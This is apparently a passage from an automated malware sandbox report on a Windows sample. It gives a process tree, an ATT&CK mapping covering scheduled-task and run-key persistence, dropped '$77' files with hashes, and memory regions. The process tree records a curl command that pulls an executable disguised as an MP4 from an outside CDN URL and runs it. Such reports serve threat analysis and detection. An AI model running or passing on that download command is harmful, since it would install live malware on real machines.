                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:5044
                                                                                                      • C:\Windows\SysWOW64\curl.exe
                                                                                                        curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/Install.mp4?v=1719043283499 --output C:\Users\Admin\AppData\Local\Temp\$77-install.exe
                                                                                                        4⤵
                                                                                                          PID:4524
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\$77-install.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\$77-install.exe"
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:1844
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                    1⤵
                                                                                                      PID:3636
                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                      1⤵
                                                                                                        PID:3828
                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                        1⤵
                                                                                                          PID:4000
                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          1⤵
                                                                                                          • Suspicious use of UnmapMainImage
                                                                                                          PID:2828
                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          1⤵
                                                                                                          • Suspicious use of UnmapMainImage
                                                                                                          PID:4168
                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:2180
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                            1⤵
                                                                                                            • Modifies data under HKEY_USERS
                                                                                                            PID:4996
                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                            1⤵
                                                                                                              PID:2164
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                              1⤵
                                                                                                                PID:1984
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
                                                                                                                1⤵
                                                                                                                  PID:2560
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                  1⤵
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  PID:4464
                                                                                                                • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                  1⤵
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  PID:3600
                                                                                                                • C:\Windows\system32\SppExtComObj.exe
                                                                                                                  C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:1308
                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                    1⤵
                                                                                                                      PID:1528
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
                                                                                                                      1⤵
                                                                                                                        PID:5084
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
                                                                                                                        1⤵
                                                                                                                          PID:4708
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=125.0.6422.142 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=125.0.2535.92 --initial-client-data=0x23c,0x240,0x244,0x238,0x24c,0x7fff9f7c4ef8,0x7fff9f7c4f04,0x7fff9f7c4f10
                                                                                                                            2⤵
                                                                                                                              PID:4660
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=1888,i,8447163055677043976,7218082390179600880,262144 --variations-seed-version --mojo-platform-channel-handle=2344 /prefetch:3
                                                                                                                              2⤵
                                                                                                                                PID:3868
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4524,i,8447163055677043976,7218082390179600880,262144 --variations-seed-version --mojo-platform-channel-handle=4060 /prefetch:8
                                                                                                                                2⤵
                                                                                                                                  PID:5452
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                1⤵
                                                                                                                                  PID:2284
                                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                  1⤵
                                                                                                                                    PID:4916
                                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                    1⤵
                                                                                                                                    • Modifies registry class
                                                                                                                                    PID:4880
                                                                                                                                  • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                                    C:\Windows\System32\WaaSMedicAgent.exe 600be30d52062e1e4ce5b8f02bbc8b07 0tLV7NAwm0+09uzLWrmqcg.0.1.0.0.0
                                                                                                                                    1⤵
                                                                                                                                      PID:1768
                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        2⤵
                                                                                                                                          PID:2148
                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                        1⤵
                                                                                                                                          PID:824
                                                                                                                                        • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                          C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                          1⤵
                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                          • Checks processor information in registry
                                                                                                                                          • Enumerates system info in registry
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:1616
                                                                                                                                        • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                          C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                          1⤵
                                                                                                                                            PID:2920
                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                            1⤵
                                                                                                                                              PID:1656
                                                                                                                                            • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                              C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                              1⤵
                                                                                                                                              • Checks processor information in registry
                                                                                                                                              • Enumerates system info in registry
                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                              PID:6128
                                                                                                                                            • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                                                                                                              C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                                              1⤵
                                                                                                                                              • Drops file in Windows directory
                                                                                                                                              PID:4980
                                                                                                                                            • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                              "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                              1⤵
                                                                                                                                                PID:5728
                                                                                                                                              • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                                1⤵
                                                                                                                                                  PID:5476
                                                                                                                                                • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                                                  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                                                  1⤵
                                                                                                                                                    PID:1592
                                                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                    1⤵
                                                                                                                                                      PID:4120

                                                                                                                                                    Network

                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                    Execution

                                                                                                                                                    Scheduled Task/Job

                                                                                                                                                    1
                                                                                                                                                    T1053

                                                                                                                                                    Scheduled Task

                                                                                                                                                    1
                                                                                                                                                    T1053.005

                                                                                                                                                    Persistence

                                                                                                                                                    Boot or Logon Autostart Execution

                                                                                                                                                    1
                                                                                                                                                    T1547

                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                    1
                                                                                                                                                    T1547.001

                                                                                                                                                    Scheduled Task/Job

                                                                                                                                                    1
                                                                                                                                                    T1053

                                                                                                                                                    Scheduled Task

                                                                                                                                                    1
                                                                                                                                                    T1053.005

                                                                                                                                                    Privilege Escalation

                                                                                                                                                    Boot or Logon Autostart Execution

                                                                                                                                                    1
                                                                                                                                                    T1547

                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                    1
                                                                                                                                                    T1547.001

                                                                                                                                                    Scheduled Task/Job

                                                                                                                                                    1
                                                                                                                                                    T1053

                                                                                                                                                    Scheduled Task

                                                                                                                                                    1
                                                                                                                                                    T1053.005

                                                                                                                                                    Defense Evasion

                                                                                                                                                    Modify Registry

                                                                                                                                                    1
                                                                                                                                                    T1112

                                                                                                                                                    Discovery

                                                                                                                                                    Query Registry

                                                                                                                                                    7
                                                                                                                                                    T1012

                                                                                                                                                    System Information Discovery

                                                                                                                                                    6
                                                                                                                                                    T1082

                                                                                                                                                    Peripheral Device Discovery

                                                                                                                                                    1
                                                                                                                                                    T1120

                                                                                                                                                    Command and Control

                                                                                                                                                    Web Service

                                                                                                                                                    1
                                                                                                                                                    T1102

                                                                                                                                                    Replay Monitor

                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                    Downloads

                                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                                      Filesize

                                                                                                                                                      328B

                                                                                                                                                      MD5

                                                                                                                                                      1ab29ab70b43259adbd68e790d8475fa

                                                                                                                                                      SHA1

                                                                                                                                                      bf2800652017b1d493df0b83cd013c7d6b0d5c6e

                                                                                                                                                      SHA256

                                                                                                                                                      3f3730bb217000588b5a872267edd626ae9959d89443d7e82046115a6644759e

                                                                                                                                                      SHA512

                                                                                                                                                      cb0752373b8e9ce0a2041d8348c60da5bdb4b2361123e2c46ace80643648d2700b937e97741a85b2d7c2b3ee85350f3371d264d89b632c62dea986bea9a2bd9b

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-aachost.exe.log
                                                                                                                                                      Filesize

                                                                                                                                                      425B

                                                                                                                                                      MD5

                                                                                                                                                      fff5cbccb6b31b40f834b8f4778a779a

                                                                                                                                                      SHA1

                                                                                                                                                      899ed0377e89f1ed434cfeecc5bc0163ebdf0454

                                                                                                                                                      SHA256

                                                                                                                                                      b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76

                                                                                                                                                      SHA512

                                                                                                                                                      1a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-scchost.exe.log
                                                                                                                                                      Filesize

                                                                                                                                                      654B

                                                                                                                                                      MD5

                                                                                                                                                      2ff39f6c7249774be85fd60a8f9a245e

                                                                                                                                                      SHA1

                                                                                                                                                      684ff36b31aedc1e587c8496c02722c6698c1c4e

                                                                                                                                                      SHA256

                                                                                                                                                      e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

                                                                                                                                                      SHA512

                                                                                                                                                      1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                                                                                                      Filesize

                                                                                                                                                      13KB

                                                                                                                                                      MD5

                                                                                                                                                      6f36b84261e03ea097c8ef5d0b3bcd03

                                                                                                                                                      SHA1

                                                                                                                                                      26ce32a2176e6aaa607cdf00a79bd1ab518f0c47

                                                                                                                                                      SHA256

                                                                                                                                                      0bd73375a22f9c45367f867c5d98998e86445a9bc1755dbacccda7a0c7ee69b5

                                                                                                                                                      SHA512

                                                                                                                                                      2d06e8a4b9a7eab40ed2e4634cc2640e21107e3e62849112040ac58d1ad851e9daaedbfcc0d3a385bee240428a64b503793e0b154ced5b3b497752a686aff917

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                                      Filesize

                                                                                                                                                      328B

                                                                                                                                                      MD5

                                                                                                                                                      f51332f5373ca34ebbdfde9218e543e4

                                                                                                                                                      SHA1

                                                                                                                                                      02ed0e0cb790346e31d40c9cbecdb2d313ccf2ae

                                                                                                                                                      SHA256

                                                                                                                                                      531a8575fd3a101110a5b1501ef9bb9544b62b8f6cd945d26df427b0c61be503

                                                                                                                                                      SHA512

                                                                                                                                                      1bb26b4ffbd04330f1039019408a78f3d0690ea308d6d4fb1cbc4e15e340c495f05deb07ae500c9f87eb99560a88b84b6bf0a71fc7482cca89534269f0975ade

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
                                                                                                                                                      Filesize

                                                                                                                                                      330B

                                                                                                                                                      MD5

                                                                                                                                                      9ae48ba20e6b5048e6b53dff22e694bd

                                                                                                                                                      SHA1

                                                                                                                                                      75ecf6b3bc7a1b659a5a60948c73e0dc9b994743

                                                                                                                                                      SHA256

                                                                                                                                                      2c43707af8ab39d6ec43ffc3cb0d97edc43ce5e2d90c0a9a7db2f23cea3a99d9

                                                                                                                                                      SHA512

                                                                                                                                                      099fbac6071009aca852cbec7606c219f6cd6dda8fdab94d5a99ae252f13065167f4e9e3a6237ab1f9ac72e579825d5de7010d27a5f1dd557da67a8e53d1e144

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
                                                                                                                                                      Filesize

                                                                                                                                                      66KB

                                                                                                                                                      MD5

                                                                                                                                                      514d0abd73e992c2a1622795b33f17f4

                                                                                                                                                      SHA1

                                                                                                                                                      96740e82d7a119d808000783507bd92690584fe6

                                                                                                                                                      SHA256

                                                                                                                                                      b333ecc39a213f6ce650dd4af50d2d201ee6f80dea63ec98132220670469bf53

                                                                                                                                                      SHA512

                                                                                                                                                      4600baecf44a9cbc7b33fd02d1807628597c6ecc87aeb12b653f6e3a46c951fe9cd789e100d96df8c57b5d0446397c8a639f0c7ee8ef9395c172598ce8185bc8

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\$77-install.exe
                                                                                                                                                      Filesize

                                                                                                                                                      163KB

                                                                                                                                                      MD5

                                                                                                                                                      1a7d1b5d24ba30c4d3d5502295ab5e89

                                                                                                                                                      SHA1

                                                                                                                                                      2d5e69cf335605ba0a61f0bbecbea6fc06a42563

                                                                                                                                                      SHA256

                                                                                                                                                      b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5

                                                                                                                                                      SHA512

                                                                                                                                                      859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
                                                                                                                                                      Filesize

                                                                                                                                                      256KB

                                                                                                                                                      MD5

                                                                                                                                                      18f497deffe88b6b2cff336a277aface

                                                                                                                                                      SHA1

                                                                                                                                                      4e1413241d3d3e4dbff399d179f8fd64f3ecd39e

                                                                                                                                                      SHA256

                                                                                                                                                      8133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5

                                                                                                                                                      SHA512

                                                                                                                                                      35c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
                                                                                                                                                      Filesize

                                                                                                                                                      299KB

                                                                                                                                                      MD5

                                                                                                                                                      12d2d1f43b0ecf5a949adde54b1ffb65

                                                                                                                                                      SHA1

                                                                                                                                                      ad0529bc9102210f3616c7b626c37d6454d44033

                                                                                                                                                      SHA256

                                                                                                                                                      619b345f6803d45bcf20305efb3407a8ae26ba0aaffe38e7b5f31cb8c26101ef

                                                                                                                                                      SHA512

                                                                                                                                                      0a55fc91d0bc7e3123b16b012c70c15f731c3be1f8499c733cc994fcec43d8cdf6279e0b9eedda35035423c8891e076be374c512d6506d81e1f81802af25153f

                                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                                                      Filesize

                                                                                                                                                      2KB

                                                                                                                                                      MD5

                                                                                                                                                      8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                                                      SHA1

                                                                                                                                                      98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                                                      SHA256

                                                                                                                                                      ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                                                      SHA512

                                                                                                                                                      c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                                                      Filesize

                                                                                                                                                      2KB

                                                                                                                                                      MD5

                                                                                                                                                      f313c5b4f95605026428425586317353

                                                                                                                                                      SHA1

                                                                                                                                                      06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                                                      SHA256

                                                                                                                                                      129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                                                      SHA512

                                                                                                                                                      b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                                                      Filesize

                                                                                                                                                      2KB

                                                                                                                                                      MD5

                                                                                                                                                      7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                                                      SHA1

                                                                                                                                                      63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                                                      SHA256

                                                                                                                                                      727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                                                      SHA512

                                                                                                                                                      f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                                                      Filesize

                                                                                                                                                      2KB

                                                                                                                                                      MD5

                                                                                                                                                      ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                                                      SHA1

                                                                                                                                                      a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                                                      SHA256

                                                                                                                                                      98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                                                      SHA512

                                                                                                                                                      1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                                                      Filesize

                                                                                                                                                      2KB

                                                                                                                                                      MD5

                                                                                                                                                      1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                                                      SHA1

                                                                                                                                                      5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                                                      SHA256

                                                                                                                                                      55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                                                      SHA512

                                                                                                                                                      5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                                                      Filesize

                                                                                                                                                      2KB

                                                                                                                                                      MD5

                                                                                                                                                      0b990e24f1e839462c0ac35fef1d119e

                                                                                                                                                      SHA1

                                                                                                                                                      9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                                                      SHA256

                                                                                                                                                      a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                                                      SHA512

                                                                                                                                                      c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                                                    • C:\Windows\TEMP\tmp55AD.tmp.bat
                                                                                                                                                      Filesize

                                                                                                                                                      163B

                                                                                                                                                      MD5

                                                                                                                                                      974be619d9594c9a718000a73f5c3c07

                                                                                                                                                      SHA1

                                                                                                                                                      99ec94e22821260b40baf6a97d9e73e2845aa2e0

                                                                                                                                                      SHA256

                                                                                                                                                      688cad4257786f32223ddd44dec09b1467fd7ebef58f5b01fee16732041cfa49

                                                                                                                                                      SHA512

                                                                                                                                                      d2ca49b29b1a39dc6c5eb7a8993c5a39cf012542726b24afe730d30fd458e13b14c878c9777fed28cd5e95632819491394cc43c3dfb43e6909de0ab16951b92c

                                                                                                                                                    • C:\Windows\Temp\__PSScriptPolicyTest_3fttutae.ooz.ps1
                                                                                                                                                      Filesize

                                                                                                                                                      60B

                                                                                                                                                      MD5

                                                                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                      SHA1

                                                                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                      SHA256

                                                                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                      SHA512

                                                                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                    • memory/380-102-0x00007FFF83DF0000-0x00007FFF83E00000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/380-95-0x00000296936A0000-0x00000296936CB000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/380-101-0x00000296936A0000-0x00000296936CB000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/428-106-0x00000265D6690000-0x00000265D66BB000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/616-62-0x000001F835500000-0x000001F83552B000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/616-61-0x000001F835500000-0x000001F83552B000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/616-68-0x000001F835500000-0x000001F83552B000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/616-60-0x000001F8354D0000-0x000001F8354F5000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      148KB

                                                                                                                                                    • memory/616-69-0x00007FFF83DF0000-0x00007FFF83E00000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/668-80-0x00007FFF83DF0000-0x00007FFF83E00000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/668-79-0x0000018E10A00000-0x0000018E10A2B000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/668-73-0x0000018E10A00000-0x0000018E10A2B000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/800-5-0x00007FFFA4A23000-0x00007FFFA4A25000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/800-6-0x0000000000DE0000-0x0000000000DF6000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      88KB

                                                                                                                                                    • memory/960-84-0x0000020235F20000-0x0000020235F4B000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/960-91-0x00007FFF83DF0000-0x00007FFF83E00000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/960-90-0x0000020235F20000-0x0000020235F4B000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/2324-47-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      32KB

                                                                                                                                                    • memory/2324-52-0x00007FFFC33F0000-0x00007FFFC34AE000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      760KB

                                                                                                                                                    • memory/2324-51-0x00007FFFC3D70000-0x00007FFFC3F65000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      2.0MB

                                                                                                                                                    • memory/2324-45-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      32KB

                                                                                                                                                    • memory/2324-50-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      32KB

                                                                                                                                                    • memory/2324-48-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      32KB

                                                                                                                                                    • memory/2324-55-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      32KB

                                                                                                                                                    • memory/2324-46-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      32KB

                                                                                                                                                    • memory/3712-10-0x0000000000E30000-0x0000000000E82000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      328KB

                                                                                                                                                    • memory/3736-0-0x0000000074F8E000-0x0000000074F8F000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/3736-1-0x0000000000080000-0x000000000008A000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      40KB

                                                                                                                                                    • memory/4392-14-0x0000000000540000-0x0000000000586000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      280KB

                                                                                                                                                    • memory/4392-1009-0x000000001C820000-0x000000001C896000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      472KB

                                                                                                                                                    • memory/4392-15-0x0000000000D30000-0x0000000000D36000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      24KB

                                                                                                                                                    • memory/4524-32-0x000002202E9A0000-0x000002202E9C2000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      136KB

                                                                                                                                                    • memory/4524-42-0x000002202ED30000-0x000002202ED5A000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      168KB

                                                                                                                                                    • memory/4524-44-0x00007FFFC33F0000-0x00007FFFC34AE000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      760KB

                                                                                                                                                    • memory/4524-43-0x00007FFFC3D70000-0x00007FFFC3F65000-memory.dmp
                                                                                                                                                      Filesize

